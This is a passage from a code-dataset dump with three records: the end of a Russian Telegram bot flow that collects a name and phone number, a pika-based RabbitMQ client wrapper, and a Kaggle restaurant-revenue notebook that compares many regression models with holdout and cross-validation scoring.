InlineKeyboardMarkup()\n markup.row_width = 1\n markup.add(\n InlineKeyboardButton(\"Я с вами!\",\n callback_data=Callbacks.other_club_yes.name),\n InlineKeyboardButton(\"Главное меню\",\n callback_data=Callbacks.main_menu.name),\n )\n return markup\n\n\ndef other_club_handler(bot, call):\n chat_id = call.message.chat.id\n if call.data == Callbacks.other_club.name:\n bot.send_message(call.message.chat.id,\n first_message, reply_markup=other_club())\n if call.data == Callbacks.other_club_yes.name:\n user_dict[chat_id] = User(call.message.text)\n bot_dict[chat_id] = bot\n\n msg = bot.send_message(\n chat_id, \"Как я могу к вам обращаться? (напишите имя)\")\n bot.register_next_step_handler(msg, set_name)\n\n\ndef set_name(message):\n chat_id = message.chat.id\n name = message.text\n user = User(name)\n user_dict[chat_id] = user\n msg = bot_dict[chat_id].send_message(\n chat_id, \"Напишите ваш сотовый номер телефона. 
Если вы даете согласие на обработку персональных данных, то нажмите «Отправить»\")\n bot_dict[chat_id].register_next_step_handler(msg, send_request)\n\n\ndef send_request(message):\n chat_id = message.chat.id\n user = user_dict[chat_id]\n phone = message.text\n user.phone = phone\n # bot_dict[chat_id].send_message(\n # chat_id, \"Оплатить подписку 990 рублей в месяц\")\n create_club_task(user.name, user.phone)\n bot_dict[chat_id].send_message(\n chat_id, \"Спасибо за ваш интерес, мы с вами свяжемся в ближайшее время\")\n","repo_name":"AntonyHatchet/tg-bot","sub_path":"flows/other/other_club.py","file_name":"other_club.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2335851181","text":"import pika\n\n\nclass AmqpClientError(Exception):\n pass\n\n\ndef create_connection(queue_servers, queue_mode = \"rabbitmq_cluster\"):\n \n if queue_mode == \"rabbitmq_cluster\":\n \n credentials = pika.PlainCredentials('guest', 'guest')\n for address in queue_servers:\n addr, port = address.split(\":\")\n conn = pika.AsyncoreConnection(\n pika.ConnectionParameters(host=addr, port=int(port), credentials=credentials)\n )\n if conn.connection_open:\n return conn\n \n else:\n \n queue_address, queue_port = queue_servers[0].split(\":\")\n return pika.AsyncoreConnection(\n pika.ConnectionParameters(\n host=queue_address, port=int(queue_port),\n credentials=pika.PlainCredentials(\"guest\", \"guest\")))\n \n \ndef _create_callback(callback, queue_mode):\n\n def amqp_callback(ch, method, header, body):\n callback(body, method.routing_key, header)\n ch.basic_ack(delivery_tag=method.delivery_tag)\n return amqp_callback\n \n\nclass AmqpClient(object):\n\n def __init__(self, conn):\n self.conn = conn\n self.chan = conn.channel()\n\n def exchange_declare(self, exchange, exchange_type, auto_delete=False):\n self.chan.exchange_declare(exchange=exchange, type=exchange_type, auto_delete=auto_delete)\n\n def queue_declare(self, qname, exclusive=False, durable=False):\n self.chan.queue_declare(queue=qname, exclusive=exclusive, durable=durable)\n\n def queue_bind(self, exchange, qname, binding_key=None):\n if binding_key is None:\n self.chan.queue_bind(\n exchange=exchange, queue=qname)\n else:\n self.chan.queue_bind(\n exchange=exchange, queue=qname,\n routing_key=binding_key)\n\n def publish(self, msg, exchange, routing_key=\"\", properties=None):\n kwargs = {\n \"exchange\": exchange,\n \"routing_key\": routing_key,\n \"body\": msg\n }\n if properties:\n kwargs[\"properties\"] = properties\n self.chan.basic_publish(**kwargs)\n\n def subscribe(self, callback, queue_name, queue_mode=\"rabbitmq_cluster\"):\n self.chan.basic_qos(prefetch_count=1)\n self.chan.basic_consume(_create_callback(callback, queue_mode), queue=queue_name)\n\n\ndef start(connections, count=100, timeout=1):\n socket_map = {}\n for conn in connections:\n socket_map[conn.dispatcher._fileno] = conn.dispatcher\n pika.asyncore_loop(socket_map, count=count, timeout=timeout)\n \n","repo_name":"appfirst/distributed_queue_manager","sub_path":"afqueue/common/amqpclient.py","file_name":"amqpclient.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71427154600","text":"# Data file\nimport numpy as np\nimport pandas as pd\nimport os\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n for filename in filenames:\n print(os.path.join(dirname, filename))\n# 
Import\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport seaborn as sns \n\nfrom sklearn.svm import SVR\nfrom sklearn.svm import LinearSVR\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.neighbors import KNeighborsRegressor # KneighborsRegressorではない\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import KFold\nfrom sklearn.linear_model import RANSACRegressor\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.linear_model import SGDRegressor\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.ensemble import VotingRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom xgboost.sklearn import XGBRegressor\nfrom lightgbm import LGBMRegressor\nfrom catboost import CatBoostRegressor\ntrain = pd.read_csv('/kaggle/input/restaurant-revenue-prediction/train.csv.zip', header=0)\ntrain.head(10)\ntest = pd.read_csv('/kaggle/input/restaurant-revenue-prediction/test.csv.zip')\ntest.head(10)\nsubmission = pd.read_csv('/kaggle/input/restaurant-revenue-prediction/sampleSubmission.csv')\nsubmission.head(10)\ntrain_mid = train.copy()\ntrain_mid['train_or_test'] = 'train'\n\ntest_mid = test.copy()\ntest_mid['train_or_test'] = 'test'\n\ntest_mid['revenue'] = 9\n\nalldata = pd.concat([train_mid, test_mid], sort=False, axis=0).reset_index(drop=True)\n\nprint('The size of the train data:' + str(train.shape))\nprint('The size of the test data:' + str(test.shape))\nprint('The size of the submission data:' + str(submission.shape))\nprint('The size of the alldata data:' + str(alldata.shape))\ntrain.describe()\ntest.describe()\nalldata.describe()\n\nprint('=====Train=====')\ntrain.info()\nprint('\\n=====Test=====')\ntest.info()\n# Check for duplicates\nidsUnique = len(set(alldata['Id']))\nidsTotal = alldata.shape[0]\nidsDupli = idsTotal - idsUnique\nprint(\"There are \" + str(idsDupli) + \" duplicate IDs for \" + str(idsTotal) + \" total entries\")\n\n# Missing data in Alldata\ndef Missing_table(df):\n # null_val = df.isnull().sum()\n null_val = df.isnull().sum()[df.isnull().sum()>0].sort_values(ascending=False)\n percent = 100 * null_val/len(df)\n na_col_list = df.isnull().sum()[df.isnull().sum()>0].index.tolist() # 欠損を含むカラムをリスト化\n list_type = df[na_col_list].dtypes.sort_values(ascending=False) #データ型\n Missing_table = pd.concat([null_val, percent, list_type], axis = 1)\n missing_table_len = Missing_table.rename(\n columns = {0:'Missing data', 1:'%', 2:'type'})\n return missing_table_len.sort_values(by=['Missing data'], ascending=False)\n\nMissing_table(alldata)\n# EDA\n# Histogram\nalldata.hist(figsize = (12,12))\n# Heatmap. 
Understand feature related to survived\nfig, ax = plt.subplots(figsize=(15,15))\nsns.heatmap(train.corr(),annot=True, center=0, square=True, linewidths=0.1, vmax=1.0, linecolor='white', cmap=\"RdBu\")\nplt.title('Restaurant Revenue Prediction', fontsize = 20)\nplt.xlabel('x-axis', fontsize = 15)\nplt.ylabel('y-axis', fontsize = 15)\nalldata['City'].value_counts()\nalldata['City Group'].value_counts()\nalldata['Type'].value_counts()\nalldata['City'].replace(['İstanbul', 'Ankara', 'İzmir'], 0,inplace=True)\nalldata['City'].replace(['Bursa', 'Samsun', 'Antalya', 'Sakarya', 'Kayseri', 'Diyarbakır', 'Tekirdağ', 'Eskişehir', 'Adana', 'Aydın', 'Muğla', 'Konya', 'Trabzon', 'Amasya', 'Uşak', 'Kastamonu', 'Karabük', 'Kütahya', 'Bolu', 'Şanlıurfa', 'Edirne', 'Kırklareli', 'Afyonkarahisar', 'Osmaniye', 'Denizli', 'Tokat', 'Balıkesir', 'Gaziantep', 'Kocaeli', 'Elazığ', 'Isparta', 'Mersin', 'Manisa', 'Çanakkale', 'Hatay', 'Zonguldak', 'Aksaray', 'Yalova', 'Kırıkkale', 'Malatya', 'Mardin', 'Batman', 'Rize', 'Artvin', 'Bilecik', 'Nevşehir', 'Sivas', 'Kırşehir', 'Erzincan', 'Erzurum', 'Ordu', 'Kahramanmaraş', 'Siirt', 'Niğde', 'Giresun', 'Çankırı', 'Çorum', 'Düzce', 'Tanımsız', 'Kars'], 1,inplace=True)\n\nalldata['City Group'] = alldata['City Group'].replace(\"Big Cities\",0).replace(\"Other\",1)\n\nalldata['Type'] = alldata['Type'].replace(\"FC\",0).replace(\"IL\",1).replace(\"DT\",2).replace(\"MB\",3)\n\nalldata[\"Open Date\"] = pd.to_datetime(alldata[\"Open Date\"])\nalldata[\"Year\"] = alldata[\"Open Date\"].apply(lambda x:x.year)\nalldata[\"Month\"] = alldata[\"Open Date\"].apply(lambda x:x.month)\nalldata[\"Day\"] = alldata[\"Open Date\"].apply(lambda x:x.day)\nalldata[\"kijun\"] = \"2015-04-27\"\nalldata[\"kijun\"] = pd.to_datetime(alldata[\"kijun\"])\nalldata[\"BusinessPeriod\"] = (alldata[\"kijun\"] - alldata[\"Open Date\"]).apply(lambda x: x.days)\n\nalldata = alldata.drop('Open Date', axis=1)\nalldata = alldata.drop('kijun', axis=1)\n\nalldata\n# Check all of datatype\nalldata.dtypes\ntrain = alldata.query('train_or_test == \"train\"')\ntest = alldata.query('train_or_test == \"test\"')\n\ntarget_column = 'revenue'\ntrain_target = train[target_column]\n\ntrain_target\ndrop_column = ['Id', 'train_or_test', 'revenue']\ntrain_feature = train.drop(columns=drop_column)\n\ntrain_feature\n# Before deleting the Id column of test data, extract only the Id column used for output. The first time I merged train and test, the first index started at 137 and the index is off by that amount. 
It's not a problem in the final output, but I don't like the way it looks, so I'll just reindex it\ntest\n# Index reset\ntest = test.reset_index()\n# Delete unnecessary index column\ndel test[\"index\"]\ntest\n# Idカラムを、submission_idとしてだけ抜き出しておく\nsubmission_id = test['Id']\n\n# 最後のテスト出力用の説明変数データを作成。学習データとカラムを合わせて、Id, train_or_test, 9のデータが入っているrevenueを削除し、学習に必要な特徴量のみを保持\ntest_feature = test.drop(columns=drop_column)\ntest_feature\n\n# 有効な特微量を探す(SelectKBestの場合)\nfrom sklearn.feature_selection import SelectKBest, f_regression\n# 特に重要な4つの特徴量のみを探すように設定してみる\nselector = SelectKBest(score_func=f_regression, k=4) \nselector.fit(train_feature, train_target)\nmask_SelectKBest = selector.get_support() # 各特徴量を選択したか否かのmaskを取得\n\n# 有効な特微量を探す(SelectPercentileの場合)\nfrom sklearn.feature_selection import SelectPercentile, f_regression\n# 特徴量のうち40%を選択\nselector = SelectPercentile(score_func=f_regression, percentile=40) \nselector.fit(train_feature, train_target)\nmask_SelectPercentile = selector.get_support()\n\n# 有効な特微量を探す(モデルベース選択の場合:SelectFromModel)\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.ensemble import RandomForestRegressor\n# estimator として RandomForestRegressor を使用。重要度が median 以上のものを選択\nselector = SelectFromModel(RandomForestRegressor(n_estimators=100, random_state=42), threshold=\"median\") \nselector.fit(train_feature, train_target)\nmask_SelectFromModel = selector.get_support()\n\n# 有効な特微量を探す(RFE:再帰的特徴量削減 : n_features_to_select)\nfrom sklearn.feature_selection import RFE\nfrom sklearn.ensemble import RandomForestRegressor\n# estimator として RandomForestRegressor を使用。特徴量を2個選択させる\nselector = RFE(RandomForestRegressor(n_estimators=100, random_state=42), n_features_to_select=2)\nselector.fit(train_feature, train_target)\nmask_RFE = selector.get_support()\n\nprint(train.columns)\nprint(mask_SelectKBest)\nprint(mask_SelectPercentile)\nprint(mask_SelectFromModel)\nprint(mask_RFE)\n\nimportant_feature = pd.DataFrame({\"Index\":train.columns[1], \"SelectKBest\":mask_SelectKBest, \"SelectPercentile\":mask_SelectPercentile, \"SelectFromModelKBest\":mask_SelectFromModel, \"RFE\":mask_RFE})\nimportant_feature.to_csv(\"important_feature.csv\", index=False)\n\n# 読み込む\nresult = pd.read_csv('important_feature.csv')\nresult.head(50)\n# 新しいカラムを作成して合計のTrue数を記載する。その後ソートで表示する\nresult[\"Total_True_Number\"] = result.sum(axis=1)\nresult.sort_values('Total_True_Number', ascending = False)\n\n# ホールドアウト法で検証するため、あらかじめデータを学習用と検証用に分割\nX_train, X_test, y_train, y_test = train_test_split(train_feature, train_target, test_size=0.2, random_state=0, shuffle=True)\n\n# 警告が多いので、いったん警告を表示されないようにする\n# 本来は表示を消すのはお勧めしない。廃止予定の関数や例外が表示されるほうが良い\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# RandomForest==============\n\nrf = RandomForestRegressor(n_estimators=200, max_depth=5, max_features=0.5, verbose=True, random_state=0, n_jobs=-1) # RandomForest のオブジェクトを用意する\nrf.fit(X_train, y_train)\nprint('='*20)\nprint('RandomForestRegressor')\nprint(f'accuracy of train set: {rf.score(X_train, y_train)}')\nprint(f'accuracy of test set: {rf.score(X_test, y_test)}')\n\n# 学習させたRandomForestをtestデータに適用して、売上を予測しましょう\nrf_prediction = rf.predict(test_feature)\nrf_prediction\n\n'''\n# Create submission data\nrf_submission = pd.DataFrame({\"Id\":submission_id, \"Prediction\":rf_prediction})\nrf_submission.to_csv(\"RandomForest_submission.csv\", index=False)\n'''\n\n# SVR(Support Vector Regression)==============\n# ※[LibSVM]や[LibLinear]は台湾国立大学の方で開発されたらしくどうしてもその表示が入るようになっている\n\nsvr = SVR(verbose=True)\nsvr.fit(X_train, 
y_train)\nprint('='*20)\nprint('SVR')\nprint(f'accuracy of train set: {svr.score(X_train, y_train)}')\nprint(f'accuracy of test set: {svr.score(X_test, y_test)}')\n\nsvr_prediction = svr.predict(test_feature)\nsvr_prediction\n\n# LinearSVR==============\n\nlsvr = LinearSVR(verbose=True, random_state=0)\nlsvr.fit(X_train, y_train)\nprint('='*20)\nprint('LinearSVR')\nprint(f'accuracy of train set: {lsvr.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lsvr.score(X_test, y_test)}')\n\nlsvr_prediction = lsvr.predict(test_feature)\nlsvr_prediction\n\n# SGDRegressor==============\n\nsgd = SGDRegressor(verbose=0, random_state=0)\nsgd.fit(X_train, y_train)\nprint('='*20)\nprint('SGDRegressor')\nprint(f'accuracy of train set: {sgd.score(X_train, y_train)}')\nprint(f'accuracy of test set: {sgd.score(X_test, y_test)}')\n\nsgd_prediction = sgd.predict(test_feature)\nsgd_prediction\n\n# k-近傍法(k-NN)==============\n\nknn = KNeighborsRegressor()\nknn.fit(X_train, y_train)\nprint('='*20)\nprint('KNeighborsRegressor')\nprint(f'accuracy of train set: {knn.score(X_train, y_train)}')\nprint(f'accuracy of test set: {knn.score(X_test, y_test)}')\n\nknn_prediction = knn.predict(test_feature)\nknn_prediction\n\n# 決定木==============\n\ndecisiontree = DecisionTreeRegressor(max_depth=3, random_state=0)\ndecisiontree.fit(X_train, y_train)\nprint('='*20)\nprint('DecisionTreeRegressor')\nprint(f'accuracy of train set: {decisiontree.score(X_train, y_train)}')\nprint(f'accuracy of test set: {decisiontree.score(X_test, y_test)}')\n\ndecisiontree_prediction = decisiontree.predict(test_feature)\ndecisiontree_prediction\n\n# LinearRegression (線形回帰)==============\n\nlr = LinearRegression()\nlr.fit(X_train, y_train)\nprint('='*20)\nprint('LinearRegression')\nprint(f'accuracy of train set: {lr.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lr.score(X_test, y_test)}')\n# 回帰係数とは、回帰分析において座標平面上で回帰式で表される直線の傾き。 原因となる変数x(説明変数)と結果となる変数y(目的変数)の平均的な関係を、一次式y=ax+bで表したときの、係数aを指す。\nprint(\"回帰係数:\",lr.coef_)\nprint(\"切片:\",lr.intercept_)\n\nlr_prediction = lr.predict(test_feature)\nlr_prediction\n\n\n# RANSACRegressor==============\n\n# ロバスト回帰を行う(自然界のデータにはたくさんノイズがある。ノイズなどの外れ値があると、法則性をうまく見つけられないことがある。そんなノイズをうまく無視してモデルを学習させるのがRANSAC)\n#線形モデルをRANSACでラッピング (外れ値の影響を抑える)\nfrom sklearn.linear_model import RANSACRegressor\n \nransac=RANSACRegressor(lr,#基本モデルは、LinearRegressionを流用\n max_trials=100,#イテレーションの最大数100\n min_samples=50,#ランダムに選択されるサンプル数を最低50に設定\n loss=\"absolute_loss\",#学習直線に対するサンプル店の縦の距離の絶対数を計算\n residual_threshold=5.0,#学習直線に対する縦の距離が5以内のサンプルだけを正常値\n random_state=0)\n \nransac.fit(X_train, y_train)\nprint('='*20)\nprint('RANSACRegressor')\nprint(f'accuracy of train set: {lr.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lr.score(X_test, y_test)}')\nprint(\"RANSAC回帰係数:\",ransac.estimator_.coef_[0])\nprint(\"RANSAC切片:\",ransac.estimator_.intercept_)\n\nransac_prediction = ransac.predict(test_feature)\nransac_prediction\n\n# RIDGE回帰==============\n\nridge = Ridge(random_state=0)\nridge.fit(X_train, y_train)\nprint('='*20)\nprint('Ridge')\nprint(f'accuracy of train set: {ridge.score(X_train, y_train)}')\nprint(f'accuracy of test set: {ridge.score(X_test, y_test)}')\n\nridge_prediction = ridge.predict(test_feature)\nridge_prediction\n\nridge_submission = pd.DataFrame({\"Id\":submission_id, \"Prediction\":ridge_prediction})\nridge_submission.to_csv(\"Ridge_submission.csv\", index=False)\n\n\n\n# LASSO回帰==============\n\nlasso = LassoCV(alphas = [1, 0.1, 0.001, 0.0005], verbose=True, 
random_state=0)\nlasso.fit(X_train, y_train)\nprint('='*20)\nprint('LassoCV')\nprint(f'accuracy of train set: {lasso.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lasso.score(X_test, y_test)}')\n\nlasso_prediction = lasso.predict(test_feature)\nlasso_prediction\n\n\n# ElasticNet==============\n\nen = ElasticNet(random_state=0)\nen.fit(X_train, y_train)\nprint('='*20)\nprint('ElasticNet')\nprint(f'accuracy of train set: {en.score(X_train, y_train)}')\nprint(f'accuracy of test set: {en.score(X_test, y_test)}')\n\nen_prediction = en.predict(test_feature)\nen_prediction\n\n# Kernel Ridge Regression(l2制約付き最小二乗学習)==============\n\nkernelridge = KernelRidge(alpha=0.6, kernel='polynomial', degree=2, coef0=2.5)\nkernelridge.fit(X_train, y_train)\nprint('='*20)\nprint('KernelRidge')\nprint(f'accuracy of train set: {kernelridge.score(X_train, y_train)}')\nprint(f'accuracy of test set: {kernelridge.score(X_test, y_test)}')\n\nkernelridge_prediction = kernelridge.predict(test_feature)\nkernelridge_prediction\n\n\n# Gradient Boosting Regression==============\n# Boostingとは弱学習器をたくさん集めて強学習器を作ろうという話が出発点で、PAC Learningと呼ばれています\n\ngradientboost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05, max_depth=4, max_features='sqrt', min_samples_leaf=15, min_samples_split=10, loss='huber', verbose=0, random_state=0)\ngradientboost.fit(X_train, y_train)\nprint('='*20)\nprint('GradientBoostingRegressor')\nprint(f'accuracy of train set: {gradientboost.score(X_train, y_train)}')\nprint(f'accuracy of test set: {gradientboost.score(X_test, y_test)}')\n\ngradientboost_prediction = gradientboost.predict(test_feature)\ngradientboost_prediction\n\n\n# XGB==============\n\nxgb = XGBRegressor(objective ='reg:squarederror', verbose=True, random_state=0) \nxgb.fit(X_train, y_train) \nprint('='*20)\nprint('XGBClassifier')\nprint(f'accuracy of train set: {xgb.score(X_train, y_train)}')\nprint(f'accuracy of test set: {xgb.score(X_test, y_test)}')\n\nxgb_prediction = xgb.predict(test_feature)\nxgb_prediction\n\n\n# lightgbm==============\n\nlgbm = LGBMRegressor(random_state=0)\nlgbm.fit(X_train, y_train)\nprint('='*20)\nprint('LGBMRegressor')\nprint(f'accuracy of train set: {lgbm.score(X_train, y_train)}')\nprint(f'accuracy of test set: {lgbm.score(X_test, y_test)}')\n\nlgbm_prediction = lgbm.predict(test_feature)\nlgbm_prediction\n\n\n# catboost==============\n\ncatboost = CatBoostRegressor(verbose=0, random_state=0)\ncatboost.fit(X_train, y_train)\nprint('='*20)\nprint('CatBoostRegressor')\nprint(f'accuracy of train set: {catboost.score(X_train, y_train)}')\nprint(f'accuracy of test set: {catboost.score(X_test, y_test)}')\n\ncatboost_prediction = catboost.predict(test_feature)\ncatboost_prediction\n\n\n# VotingRegressor==============\n\n# voting に使う分類器を用意する\nestimators = [\n (\"rf\", rf),\n (\"svr\", svr),\n (\"lsvr\", lsvr),\n (\"sgd\", sgd),\n (\"knn\", knn),\n (\"decisiontree\", decisiontree),\n (\"lr\", lr),\n (\"ransac\", ransac),\n (\"ridge\", ridge),\n (\"lasso\", lasso),\n (\"en\", en),\n (\"kernelridge\", kernelridge),\n (\"gradientboost\", gradientboost),\n (\"xgb\", xgb),\n (\"lgbm\", lgbm),\n (\"catboost\", catboost),\n]\n\nvote = VotingRegressor(estimators=estimators)\nvote.fit(X_train, y_train)\nprint('='*20)\nprint('VotingRegressor')\nprint(f'accuracy of train set: {vote.score(X_train, y_train)}')\nprint(f'accuracy of test set: {vote.score(X_test, y_test)}')\n\nvote_prediction = vote.predict(test_feature)\nvote_prediction\n\n\n# 
※重要な特微量を探す(RandomForestを利用する)\nplt.figure(figsize=(20,10))\nplt.barh(\n X_train.columns[np.argsort(rf.feature_importances_)],\n rf.feature_importances_[np.argsort(rf.feature_importances_)],\n label='RandomForestRegressor'\n)\nplt.title('RandomForestRegressor feature importance')\n\n# ※重要な特微量を探す(決定木やXGBを利用する)\n\n\nfrom sklearn import tree\ntext_representation = tree.export_text(decisiontree)\nprint(text_representation)\n\nwith open(\"decistion_tree.log\", \"w\") as fout:\n fout.write(text_representation)\n\n\nfig = plt.figure(figsize=(25,20))\n_ = tree.plot_tree(decisiontree, \n feature_names=X_train.columns, \n class_names=target_column,\n filled=True)\nfig.savefig(\"decistion_tree.png\")\n\nimport graphviz\n# DOT data\ndot_data = tree.export_graphviz(decisiontree, out_file=None, \n feature_names=X_train.columns, \n class_names=target_column,\n filled=True)\n\n# Draw graph\ngraph = graphviz.Source(dot_data, format=\"png\") \ngraph\ngraph.render(\"decision_tree_graphivz\")\n'decision_tree_graphivz.png'\n\n# 重要度を出力\nfor n, v in zip(X_train.columns, decisiontree.feature_importances_):\n print(f'importance of {n} is :{v}')\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# RandomForest==============\n\nkf = KFold(n_splits = 5, shuffle = True, random_state=0)\n\nrf = RandomForestRegressor(n_estimators=200, max_depth=5, max_features=0.5, verbose=True, random_state=0, n_jobs=-1) # RandomForest のオブジェクトを用意する\nrf_cross_score = cross_validate(rf, train_feature, train_target, cv=kf)\nrf_cross_score\nprint('='*20)\nprint('RandomForestRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{rf_cross_score[\"test_score\"].mean()}, 標準偏差 std:{rf_cross_score[\"test_score\"].std()}')\nprint(\"交差検証トレーニングのscore:\",format(rf_cross_score))\n#print(\"交差検証テストのscore:\",format(np.mean(rf_cross_score)))\n\n# SVR(Support Vector Regression)==============\n# ※[LibSVM]や[LibLinear]は台湾国立大学の方で開発されたらしくどうしてもその表示が入るようになっている\n\nsvr = SVR(verbose=True)\nsvr_cross_score = cross_validate(svr, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('SVR 交差検証(Cross-validation)')\nprint(f'平均値 mean:{svr_cross_score[\"test_score\"].mean()}, 標準偏差 std:{svr_cross_score[\"test_score\"].std()}')\n\n# LinearSVR==============\n\nlsvr = LinearSVR(verbose=True, random_state=0)\nlsvr_cross_score = cross_validate(lsvr, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('LinearSVR 交差検証(Cross-validation)')\nprint(f'平均値 mean:{lsvr_cross_score[\"test_score\"].mean()}, 標準偏差 std:{lsvr_cross_score[\"test_score\"].std()}')\n\n\n# SGDRegressor==============\n\nsgd = SGDRegressor(verbose=0, random_state=0)\nsgd_cross_score = cross_validate(sgd, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('SGDRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{sgd_cross_score[\"test_score\"].mean()}, 標準偏差 std:{sgd_cross_score[\"test_score\"].std()}')\n\n\n# k-近傍法(k-NN)==============\n\nknn = KNeighborsRegressor()\nknn_cross_score = cross_validate(knn, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('KNeighborsRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{knn_cross_score[\"test_score\"].mean()}, 標準偏差 std:{knn_cross_score[\"test_score\"].std()}')\n\n\n\n# 決定木==============\n\ndecisiontree = DecisionTreeRegressor(max_depth=3, random_state=0)\ndecisiontree_cross_score = cross_validate(decisiontree, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('DecisionTreeRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{decisiontree_cross_score[\"test_score\"].mean()}, 標準偏差 
std:{decisiontree_cross_score[\"test_score\"].std()}')\n\n\n\n\n# LinearRegression (線形回帰)==============\n\nlr = LinearRegression()\nlr_cross_score = cross_validate(lr, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('LinearRegression 交差検証(Cross-validation)')\nprint(f'平均値 mean:{lr_cross_score[\"test_score\"].mean()}, 標準偏差 std:{lr_cross_score[\"test_score\"].std()}')\n\n\n# RANSACRegressor==============\n\n# ロバスト回帰を行う(自然界のデータにはたくさんノイズがある。ノイズなどの外れ値があると、法則性をうまく見つけられないことがある。そんなノイズをうまく無視してモデルを学習させるのがRANSAC)\n#線形モデルをRANSACでラッピング (外れ値の影響を抑える)\nfrom sklearn.linear_model import RANSACRegressor\n \nransac=RANSACRegressor(lr,#基本モデルは、LinearRegressionを流用\n max_trials=100,#イテレーションの最大数100\n min_samples=50,#ランダムに選択されるサンプル数を最低50に設定\n loss=\"absolute_loss\",#学習直線に対するサンプル店の縦の距離の絶対数を計算\n residual_threshold=5.0,#学習直線に対する縦の距離が5以内のサンプルだけを正常値\n random_state=0)\n \nransac_cross_score = cross_validate(ransac, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('RANSACRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{ransac_cross_score[\"test_score\"].mean()}, 標準偏差 std:{ransac_cross_score[\"test_score\"].std()}')\n\n\n# RIDGE回帰==============\n\nridge = Ridge(random_state=0)\nridge_cross_score = cross_validate(ridge, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('Ridge 交差検証(Cross-validation)')\nprint(f'平均値 mean:{ridge_cross_score[\"test_score\"].mean()}, 標準偏差 std:{ridge_cross_score[\"test_score\"].std()}')\n\n\n\n\n# LASSO回帰==============\n\nlasso = LassoCV(alphas = [1, 0.1, 0.001, 0.0005], verbose=True, random_state=0)\nlasso_cross_score = cross_validate(lasso, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('LassoCV 交差検証(Cross-validation)')\nprint(f'平均値 mean:{lasso_cross_score[\"test_score\"].mean()}, 標準偏差 std:{lasso_cross_score[\"test_score\"].std()}')\n\n\n# ElasticNet==============\n\nen = ElasticNet(random_state=0)\nen_cross_score = cross_validate(en, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('ElasticNet 交差検証(Cross-validation)')\nprint(f'平均値 mean:{en_cross_score[\"test_score\"].mean()}, 標準偏差 std:{en_cross_score[\"test_score\"].std()}')\n\n\n# Kernel Ridge Regression(l2制約付き最小二乗学習)==============\n\nkernelridge = KernelRidge(alpha=0.6, kernel='polynomial', degree=2, coef0=2.5)\nkernelridge_cross_score = cross_validate(kernelridge, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('KernelRidge 交差検証(Cross-validation)')\nprint(f'平均値 mean:{kernelridge_cross_score[\"test_score\"].mean()}, 標準偏差 std:{kernelridge_cross_score[\"test_score\"].std()}')\n\n\n# Gradient Boosting Regression==============\n# Boostingとは弱学習器をたくさん集めて強学習器を作ろうという話が出発点で、PAC Learningと呼ばれています\n\ngradientboost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05, max_depth=4, max_features='sqrt', min_samples_leaf=15, min_samples_split=10, loss='huber', verbose=0, random_state=0)\ngradientboost_cross_score = cross_validate(gradientboost, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('GradientBoostingRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{gradientboost_cross_score[\"test_score\"].mean()}, 標準偏差 std:{gradientboost_cross_score[\"test_score\"].std()}')\n\n\n# XGB==============\n\nxgb = XGBRegressor(objective ='reg:squarederror', verbose=True, random_state=0) \nxgb_cross_score = cross_validate(xgb, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('XGBClassifier 交差検証(Cross-validation)')\nprint(f'平均値 mean:{xgb_cross_score[\"test_score\"].mean()}, 標準偏差 std:{xgb_cross_score[\"test_score\"].std()}')\n\n\n# lightgbm==============\n\nlgbm = 
LGBMRegressor(random_state=0)\nlgbm_cross_score = cross_validate(lgbm, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('LGBMRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{lgbm_cross_score[\"test_score\"].mean()}, 標準偏差 std:{lgbm_cross_score[\"test_score\"].std()}')\n\n\n# catboost==============\n\ncatboost = CatBoostRegressor(verbose=0, random_state=0)\ncatboost_cross_score = cross_validate(catboost, train_feature, train_target, cv=kf)\nprint('='*20)\nprint('CatBoostRegressor 交差検証(Cross-validation)')\nprint(f'平均値 mean:{catboost_cross_score[\"test_score\"].mean()}, 標準偏差 